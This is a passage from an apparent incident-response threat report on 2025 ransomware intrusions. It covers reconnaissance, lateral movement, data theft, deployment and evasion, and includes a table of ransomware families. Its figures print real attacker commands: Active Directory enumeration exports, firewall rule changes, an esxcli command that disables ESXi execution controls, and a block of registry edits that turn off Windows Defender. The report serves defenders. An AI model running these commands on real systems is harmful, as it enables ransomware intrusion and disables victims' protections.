<p role="presentation"><span>In a handful of incidents, threat actors targeted Chromium-based browsers to obtain stored credentials. For example, in an UNC2165 RANSOMHUB incident, the threat actors executed inline PowerShell to retrieve and decrypt DPAPI-protected master encryption key from the Local State files of Google Chrome and Microsoft Edge allowing access to stored credentials within the browsers.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors accessed or attempted to access common password management tools, including KeePass, Bitwarden, and the Windows Credential Manager. During one UNC2465 intrusion involving AGENDA ransomware, the threat actor accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During a REDBIKE ransomware incident, the threat actor likely harvested a cleartext password from a SonicWall appliance, which was also shared with an admin account, granting the actor domain administrator privileges.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one ransomware incident targeting a victim's virtualized environment, the threat actor exploited CVE-2024-37085 to gain administrator access to an ESXi hypervisor.</span></p>
</li>
</ul>
<h4><span>Internal Reconnaissance</span></h4>
<p><span>In 2025, the tactics leveraged for internal reconnaissance remained fairly consistent with recent years; threat actors continued to rely on native system utilities, PowerShell commands, and publicly available software.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors consistently used PowerShell to query Active Directory (AD) objects for running processes, network shares, and user group memberships. This activity ranged from using native cmdlets like Get-ADComputer and Get-ADUser to using script blocks to query other system data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In several cases, threat actors used Get-ADComputer and Get-ADUser to export lists of AD objects to a separate file. For example, in an incident involving MEDUSALOCKER.V2, the threat actors queried specific user object properties, exported account identity, contact information, and organizational metadata (Figure 8). At the same incident, the threat actors executed a different command to query domain-joined computers, capturing properties such as the operating system (OS), IPv4 address, and last logon date (Figure 9).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In some instances, threat actors executed PowerShell script blocks that ran a multitude of commands at once. For example, in an INTERLOCK incident, the threat actors ran a condensed one-line script that performed user profiling—including identifying the current user's username, Security Identifier (SID), and group memberships—checked for a domain connection, and enumerated the Domain Admins group. Notably, the script included a jitter, or time delay, to create random pauses between command execution, likely in an attempt to evade detection against rapid-fire command execution.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors continued to rely heavily on internal Windows utilities in this phase of the attack lifecycle, including ipconfig, netstat, ping, and nltest, among others.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Publicly available reconnaissance utilities were used in numerous intrusions. These publicly available tools ranged from those specialized in probing networks, such as Advanced IP Scanner, Softperfect Network Scanner (NETSCAN), and Angry IP Scanner, to red-teaming tools like PowerSploit and IMPACKET. Notably, network reconnaissance utilities like Advanced IP Scanner, NETSCAN, and Angry IP Scanner were used in approximately 50% of intrusions, similar to their observed usage in 2023 and 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We often saw threat actors accessing files and folders related to potentially sensitive information. In some cases, they appeared to search for backup scripts and password managers, while in other cases they were likely attempting to find sensitive files to exfiltrate in order to increase the pressure applied by data theft extortion.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a REDBIKE intrusion, the threat actors searched for keywords like "passport," "i9," and "cyber insurance." In addition to searching for personally identifiable information (PII) like passports and employment eligibility forms, it is plausible that the threat actors were also seeking to obtain the victim's cyber insurance policies to help them determine a negotiation strategy or maximum ransom amount to demand.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Several threat actors performed targeted internal reconnaissance for information about virtualized infrastructure within the victim environment, likely to facilitate ransomware deployment on these systems. In a REDBIKE incident, threat actors enumerated hypervisors by running the Get-VM cmdlet and accessed the internal VMware vSphere web portal.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADUser -filter * -properties Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | select Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | export-csv C:\Users\Public\Music\users.csv </code></pre>
<p><span>Figure 8: Get-ADUser HostCmd</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\users\public\music\AllWindows.csv -NoTypeInformation -Encoding UTF8</code></pre>
<p><span>Figure 9: Get-ADComputer HostCmd</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Lateral Movement</span></h4>
<p><span>Throughout 2025, actors extensively used common built-in protocols, including RDP, Server Message Block (SMB), and Secure Shell (SSH), combined with compromised credentials or attacker-created accounts for lateral movement. We also observed actors leveraging a variety of tools and utilities to tunnel and proxy traffic within victim environments.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>In approximately 85% of intrusions, threat actors leveraged RDP with either compromised or attacker-created accounts for lateral movement.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Across a range of incidents we observed threat actors leveraging SMB for lateral movement to access network shares, stage payloads, and execute remote commands.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>During one SAFEPAY ransomware incident, the threat actor leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed multiple actors leverage IMPACKET.SMBEXEC to execute remote commands. For example, in one intrusion leading to MEDUSALOCKER.V2 ransomware, the threat actor leveraged IMPACKET.SMBEXEC to run commands to create a new local administrator account on a remote host.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Across numerous incidents we observed various threat actors leverage common public utilities like PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continued to observe frequent use of common Windows utilities like PsExec, Windows Remote Management (WinRM), and to a lesser extent Windows Management Instrumentation Command-line (WMIC), for remote execution and lateral movement.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a handful of intrusions, threat actors used PowerShell to establish interactive remote sessions via WinRM using the "Enter-PSSession" cmdlet.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an UNC5774 INTERLOCK ransomware incident, the threat actors used WinRM to establish a connection to a domain controller and execute remote commands, including using net.exe to reset the password of a user account.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During an UNC2465 incident, the threat actor moved laterally by using WMIC to execute a SMOKEDHAM payload on a remote host.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In numerous incidents, threat actors manipulated firewall rules in order to enable different types of traffic, such as RDP or SMB, to be allowed within the victim environment.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In one incident, UNC6021, a suspected FIN6 threat cluster, created a scheduled task that ran a netsh command to modify firewall rules to enable remote desktop access (Figure 10).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one UNC6276 intrusion, the threat actor disabled the firewall on an ESXi host before deploying SYSTEMBC.LINUX on the host.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In one incident the threat actor installed OpenSSH on a host and ran a PowerShell command to configure a new firewall rule to allow inbound traffic on port 22 (Figure 11).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an intrusion leading to the deployment of INC ransomware, the threat actor leveraged an attacker-created account to create new firewall policies that granted access to multiple additional subnets within the network.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors leveraged a variety of malicious and legitimate utilities to tunnel and proxy traffic within victim networks, including SYSTEMBC, VIPERTUNEL, PYSOXY, CLOUDFLARED, and OpenSSH. During one LOCKBIT.WARLOCK intrusions the threat actor leveraged CLOUDFLARED to tunnel an RDP connection between two hosts.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a minimal number of incidents, threat actors leveraged publicly available post-exploitation tools including METASPLOIT and AMNESIAC.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Threat actors often abused access to various management consoles for virtual systems to move laterally to virtual hosts. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In multiple instances, the threat actors appeared to leverage this access to enable SSH on ESXi hosts prior to establishing SSH connections for lateral movement. For example, in a FOULFOG.LINUX incident, threat actors leveraged access from the victim's VMware vSphere centralized management portal to enable SSH on a vm-host, created user root1, SSHed using the newly created user, and disabled firewall.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one incident the threat actor leveraged access to the victim's Nutanix Prism Central management tool along with a compromised account to move laterally to multiple additional systems. In the same incident, the threat actor also used the VMware web user interface to access numerous ESXi hosts.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In a subset of intrusions we observed evidence of threat actors conducting bruteforce attacks to gain access to accounts on additional systems.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=No</code></pre>
<p><span>Figure 10: netsh command to modify firewall rules to enable remote access</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell.exe -Command New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22</code></pre>
<p><span>Figure 11: PowerShell command to allow inbound SSH traffic</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Complete Mission</span></h4>
<p><span>The following sections highlight observations from the complete mission phase of the attack lifecycle, covering ransomware deployment, data exfiltration, and anti-analysis and recovery techniques. Threat actors conducting ransomware attacks routinely conduct multifaceted extortion operations involving data theft as it provides additional leverage during negotiations. Threat actors also consistently engage in a diverse range of tactics to ensure the success of their operations and reduce the ability for victims to recover, including tampering with security software, deleting backups, and clearing logs. Notable trends in 2025 include the prevalence of REDBIKE ransomware, an increase in the percentage of incidents involving data theft extortion, and indications that the techniques used to target virtual systems may be maturing.</span></p>
<h4><span>Ransomware Families</span></h4>
<p><span>REDBIKE was the most prominent ransomware observed in 2025 Mandiant incident response investigations, followed by AGENDA and then INC ransomware (Figure 12). In 2024, REDBIKE was tied for the number one spot with LOCKBIT.BLACK and RANSOMHUB; however, in 2024 LOCKBIT experienced significant disruptive actions stemming from law enforcement actions and in 2025 RansomHub abruptly ceased operations. Throughout 2025 we also observed a handful of incidents involving newly identified ransomware, such as NINTHBEE and SILVERPINE, demonstrating that at least a subset of threat actors are developing and maintaining new ransomware families.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>REDBIKE was seen in almost 30% of 2025 ransomware incidents, surpassing previous highs for single ransomware families, including LOCKBIT and ALPHV reaching 17% each in 2023.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continue to observe threat actors reusing existing ransomware families in seemingly unrelated operations conducted under different extortion brands.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>While we have seen a significant decrease in LOCKBIT ransomware incidents since the legal actions taken against the RaaS in 2024, in 2025 we did observe a handful of LOCKBIT.WARLOCK incidents. The WarLock DLS emerged in July 2025 and has listed over 75 victims since. LOCKBIT.WARLOCK largely leverages the original LOCKBIT codebase; however, it uses different encryption algorithms, and refactors previously inlined operations into dedicated functions.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In 2025, we observed a handful of intrusions involving CONTI ransomware, though the CONTI RaaS was shut down in May 2022 following the leak of associated chat logs and the CONTI source code. For example, we observed CONTI deployed in a 2025 incident associated with the Gunra ransomware group; analysis of the ransomware payload identified it was heavily based on CONTI's source code, with slight variations in obfuscation.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed three different extortion brands leveraging INC ransomware in their operations: INC Ransom, Sinobi, and Lynx. The INC ransomware source code was advertised in an underground forum in May 2024 but the Lynx and INC Ransom DLS domains were acquired by a common threat actor.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>GTIG observed ODDSIDE ransomware in an incident in 2025; ODDSIDE is PowerShell-based ransomware that refers to itself as DARKMATTER. While not completely unheard of, PowerShell-based ransomware is fairly rare.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Notably, in one incident we observed threat actors deploy CLOP ransomware. This is the first time we’ve responded to a CLOP ransomware incident since 2020, though we have occasionally identified CLOP ransomware samples uploaded to malware repositories. In recent years, threat actors associated with the CL0P data leak site have primarily conducted data-theft-extortion-only operations rather than performing encryption.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a subset of incidents, we were unable to obtain the ransomware payloads. For example, we observed a handful of TridentLocker-branded ransomware incidents in which there is evidence to suggest that the ransomware payload was executed in memory. It's plausible the threat actors used in-memory execution to deploy ransomware to try and bypass security detections and potentially make analysis and recovery efforts more difficult.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Threat actors occasionally abuse legitimate encryption tools in their extortion operations. In 2025, we observed an incident in which threat actors used BitLocker to encrypt over 200 remote hosts.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig12.max-1000x1000.png" alt="Distribution of ransomware families observed in 2025 investigations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 12: Distribution of ransomware families observed in 2025 investigations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td colspan="3">
<p><strong><span>Ransomware Families Observed in 2025 Mandiant Investigations</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>AGENDA</span></p>
<p><span>AGENDA.ESXI</span></p>
<p><span>AGENDA.RUST</span></p>
</td>
<td>
<p><span>BABUK</span></p>
<p><span>BABUK.MARIO</span></p>
</td>
<td>
<p><span>CLOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>CONTI</span></p>
</td>
<td>
<p><span>CRYTOX</span></p>
</td>
<td>
<p><span>DOLLARLOCKER</span></p>
</td>
</tr>
<tr>
<td>
<p><span>FOULFOG.LINUX</span></p>
</td>
<td>
<p><span>INC</span></p>
<p><span>INC.LINUX</span></p>
</td>
<td>
<p><span>INTERLOCK</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LOCKBIT.UNIX</span></p>
<p><span>LOCKBIT.WARLOCK</span></p>
</td>
<td>
<p><span>MEDUSALOCKER.V2</span></p>
</td>
<td>
<p><span>NINTHBEE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>NITROGEN</span></p>
</td>
<td>
<p><span>ODDSIDE</span></p>
</td>
<td>
<p><span>PLAYCRYPT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RANSOMHUB</span></p>
</td>
<td>
<p><span>REDBIKE</span></p>
</td>
<td>
<p><span>RHYSIDA</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RIFTTEAR</span></p>
</td>
<td>
<p><span>SAFEPAY</span></p>
</td>
<td>
<p><span>SILVERPINE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>WHITERABBIT</span></p>
</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 3: Ransomware families observed in Mandiant's 2025 incident response investigations</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Data Exfiltration</span></h4>
<p><span>In 2025, we observed confirmed or suspected data theft in approximately 77% of ransomware intrusions, a notable increase from approximately 57% in 2024. In these incidents, the most frequently observed strategies for identifying, staging, and exfiltrating data included the use of legitimate data synchronization tools such as Rclone and MEGASync, file compression using built-in tools or portable versions of WinRar or 7Zip, and FTP clients such as Filezilla or Winscp.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>During intrusions where data was stolen, we routinely observed threat actors targeting a variety of sensitive data types, including legal, human resources, accounting, and business development data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed evidence of threat actors conducting manual reconnaissance of systems likely to gather sensitive data for exfiltration such as accessing emails and attempting to access SharePoint and other Microsoft 365 environments via the browser.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, threat actors continued to rely on publicly available tools and utilities—including Rclone, MEGASync, Megatools, restic, and possibly Cyberduck—to exfiltrate data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed Rclone in approximately 28% of intrusions where data theft was confirmed or suspected to exfiltrate data to attacker-controlled infrastructure.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In one INC ransomware incident, the threat actor used the wget and curl commands to download Rclone and an INC.LINUX ransomware payload respectively to a network-attached storage (NAS) server. The threat actor subsequently ran Rclone to exfiltrate data from the server prior to manually executing the INC.LINUX payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors installed and/or leveraged legitimate FTP/SFTP clients in 26% of intrusions where data theft was observed or suspected. Commonly observed software included FileZilla, WinSCP, and PuTTY Secure Copy.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>While not confirmed to be used for data exfiltration, we observed threat actors installing and/or executing various utilities that could be used to aid in the reconnaissance, staging, and export of stolen data such as Total Commander, Xcopy, and Gpg4win.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors leveraged a myriad of legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, and MEGA, and OneDrive.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In one UNC5471 intrusion leading to AGENDA ransomware, the threat actor leveraged batch scripts alongside WinRAR to automate the archiving of files in directories. The actor then used Megatools and SLEETSEND to exfiltrate the data to the MEGA and Cloudzy cloud storage services.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed multiple threat actors transferring stolen data to attacker-controlled OneDrive accounts. During one UNC5496 intrusion, the threat actor ran commands to have Rclone transfer all files that matched a list of common file extension types to a threat actor-controlled OneDrive account.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In multiple incidents, we observed threat actors leveraging AzCopy to transfer stolen files to attacker-controlled Azure storage.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one UNC6098 intrusion, the threat actor leveraged the SQL Server Import and Export Wizard to export a SQL database.</span></p>
</li>
</ul>
<h4><span>Ransomware Deployment</span></h4>
<p><span>We observed a diverse set of ransomware deployment techniques leveraged in intrusions throughout 2025. Threat actors employed both manual and automated deployment techniques, including the use of batch scripts, scheduled tasks, Group Policy Objects (GPOs), registry keys, and PowerShell scripts. Notably, in almost 20% of incidents, threat actors targeted virtualization infrastructure, and we observed multiple incidents where operators automated portions of their ransomware deployment against ESXi hosts, suggesting techniques used to target virtual systems may be maturing.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors often relied on automated mechanisms to deploy ransomware. In many cases, they relied on native Windows mechanisms to facilitate ransomware execution.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Multiple threat clusters leveraged batch scripts to facilitate ransomware payload execution in victim environments. In one LOCKBIT.WARLOCK intrusion, the threat actor staged NetExec on a domain controller along with files to run the ransomware payload. The threat actor then used NetExec to copy a batch file to numerous hosts via SMB and run it to execute the ransomware payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a separate LOCKBIT.WARLOCK intrusion, the threat actor staged ransomware payloads on multiple hosts via SMB before executing them via scheduled tasks.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During a NINTHBEE ransomware incident, the threat actor modified a GPO to include a malicious scheduled task that disabled Windows Defender and subsequently executed the ransomware payload. In the same intrusion, the threat actor also attempted to execute the NINTHBEE payload on multiple remote hosts via PsExec.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an incident likely involving DOLLARLOCKER, a threat actor created a Windows service to run a command to execute the ransomware payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Multiple threat clusters leveraged the Windows Registry to complete their ransomware deployment objectives. During an UNC5471 intrusion, the threat actor created registry Run keys to execute AGENDA ransomware on multiple servers persistently. In one INTERLOCK ransomware intrusion, following encryption, the threat actor modified the LegalNoticeCaption and LegalNoticeText registry values to display a banner indicating the system was ransomed on start up.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In addition to using SMB to stage ransomware payloads, we also observed threat actors leverage SMB to facilitate more expansive ransomware deployment across victim networks. In one incident, actors identified network shares via the "Invoke-ShareFinder" PowerShell cmdlet and likely supplied this list to REDBIKE as a list of targets. Ultimately, encryption was attempted on more than 500 endpoints via SMB.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a small subset of observed intrusions, threat actors leverage PowerShell to automate the deployment of BitLocker encryption across victims' environments. During one intrusion, the threat actor used a PowerShell script to install, configure, and assign passwords for BitLocker on multiple hosts. The threat actor then enabled encryption on multiple drives on these hosts and scheduled a system restart to force the hosts into a locked state. The actor also modified the registry to display a ransom note on the BitLocker preboot recovery screen.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024. While ransomware deployment to virtual systems is often done manually, in 2025 we observed at least some incidents where threat actors attempted to automate portions of the ransomware deployment stage.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>During an UNC5495 intrusion, the threat actor automated the deployment of BABUK.MARIO by leveraging a batch script that accepted credentials for ESXi hosts. The batch script used a staged copy of KiTTY to copy the ransomware payload to the host and then connect via SSH and run a command to execute the payload on each host. In a separate intrusion, a threat actor leveraged a PowerShell script to authenticate to the victim's vCenter server, set new root passwords, and enable SSH on ESXi hosts. The same script was used to subsequently copy a RIFTEAR ransomware payload to the hosts, delete backups, shutdown virtual machines (VMs), and disable security policies prior to executing the ransomware payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Prior to ransomware deployment on ESXi hosts, threat actors commonly disabled the ExecInstalledOnly setting on hosts to allow for the execution of custom binaries (Figure 13). During one intrusion, the threat actor also accessed a vCenter server and modified the Lockdown Mode Exception Users settings, which controls users that are allowed to maintain privileges when the host is in lockdown mode.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Across multiple intrusions, threat actors took steps to stop virtual machines and unlock files prior to decryption, almost certainly to maximize the impact of their ransomware payloads.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In multiple instances threat actors used or attempted to use IOBIT, a legitimate uninstaller utility, to unlock files in use by other programs prior to executing ransomware payloads.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed multiple actors shutting down virtual machines and deleting backups and snapshots prior to encryption. In at least one intrusion, an actor leveraged a PowerShell script to automate the process of powering off virtual machines.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one intrusion, the threat actor accessed the victim's Commvault server and deleted vCenter backup volumes prior to encryption to hinder recovery.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During a TridentLocker-branded ransomware incident, we assess with moderate confidence that the threat actor leveraged the same CrushFTP preview hijacking technique used for WAVECALL persistence to download and execute a ransomware payload from the WAVECALL C2 server.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>esxcli system settings advanced set -o /User/execInstalledOnly -i 0</code></pre>
<p><span>Figure 13: Command to disable ExecInstalledOnly setting on ESXi hosts</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Anti-Detection, Analysis, and Recovery Tactics</span></h4>
<p><span>Ransomware actors consistently engage in anti-detection, anti-analysis, and anti-recovery tactics in their operations in an effort to not only prevent detection during the intrusion, but increase the difficulty for victims to recover post-encryption. While these tactics are often manually performed by threat actors, numerous ransomware families feature built-in capabilities to hinder analysis and delete backups prior to encryption.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors consistently disabled and tampered with security controls during ransomware intrusions to avoid detection and/or block of execution of malicious payloads. Most commonly, we observed threat actors disabling Windows Defender, often by modifying the Windows registry. In some other cases, the threat actors modified Defender configurations via the Set-MpPreference PowerShell cmdlet to add exclusions for their malware and ransomware payloads. Threat actors also were observed leveraging GPOs, scheduled tasks, and PowerShell scripts in order to tamper with a variety of security controls.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a REDBIKE incident, threat actors used PowerShell to disable a multitude of Windows Defender features by running commands to modify a variety of values associated with Windows Defender registry keys, including DisableRealtimeMonitoring, DisableScanOnRealtimeEnable, and DisableOnAccessProtection (Figure 14).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an intrusion involving WHITERABBIT, threat actors executed a Base64-encoded PowerShell command that used the "Add-MpPreference" cmdlet to modify the Defender Exclusion list to include the ransomware binary; a variety of file extensions, such as ".cmd," ".bat," and ".exe"; as well as User Data folders.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an incident involving NINTHBEE, threat actors registered a scheduled task to execute daily a command that disables Microsoft Defender's real-time scanning for downloaded files and email attachments.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors often deleted artifacts and cleared event logs to remove evidence of their activity. These records included information about command execution, firewall traffic, and stolen credentials. The wevtutil utility was used to facilitate log deletion in multiple instances.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a FOULFOG.LINUX incident, the threat actors renamed the ransomware binary to a less suspicious name, "filerw"; deleted the command history for the system; and created an empty file to replace the deleted file.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In some cases, threat actors used benign names in their operations in an attempt to masquerade as legitimate software or system resources. For example, in a RIFTTEAR incident, threat actors registered a scheduled task named "\Microsoft\Update" to execute a malicious command likely intended to kill endpoint detection and response (EDR) processes. In a separate case involving CONTI, the ransomware binary had its filename renamed from "enc_lin" to "rsync" in an attempt to appear as the native synchronization command-line utility.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors often disabled or deleted backups to inhibit and/or limit recovery options. In some cases, threat actors stopped backup servers and/or deleted Volume Shadow Copies (VSS) via PowerShell scripts.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Notably, in a RANSOMHUB incident, the threat actors used the access to Cisco Integrated Management Controller (CIMC) to map a Debian Linux ISO image via Virtual Media across a nine-node Cohesity cluster. By modifying the boot priority and hardware power-cycling, the nodes booted into the external Linux environment, overwriting the Cohesity operating system (OS) and rendering the backup data inaccessible.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In a handful of intrusions, the threat actors used tooling to terminate processes and services associated with security software solutions, specifically those abusing signed kernel mode drivers. Examples include the open-source TERMINATOR and WATCHDOGKILLER, as well as non-publicly available tools such as WARCLAW, a utility that decodes and installs a vulnerable kernel mode driver.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1"

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f</code></pre>
<p><span>Figure 14: Windows Defender registry key modification</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Tool Prevalence</span></h4>
<p><span>Throughout 2025, we continued to see ransomware actors rely heavily on publicly available tools and legitimate software across various stages of ransomware intrusions. While legitimate software remains popular, we observed a slight decrease in the use of RMM tools and post-exploitation C2 frameworks. Notably, both WinRAR and Rclone were observed in almost one-fourth of incidents, likely corresponding with the increase in incidents involving data theft, given that these tools are regularly used to stage and exfiltrate data respectively.</span></p>
<ul>
<li aria-level="1">
